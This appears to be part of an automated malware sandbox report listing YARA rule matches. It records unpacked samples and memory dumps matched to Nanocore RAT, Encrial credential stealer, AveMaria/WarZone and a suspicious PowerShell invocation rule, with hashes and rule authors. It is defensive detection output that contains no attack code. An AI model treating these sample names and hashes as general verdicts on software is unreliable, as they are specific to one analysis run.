        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000002.2096261364.00000000002C0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
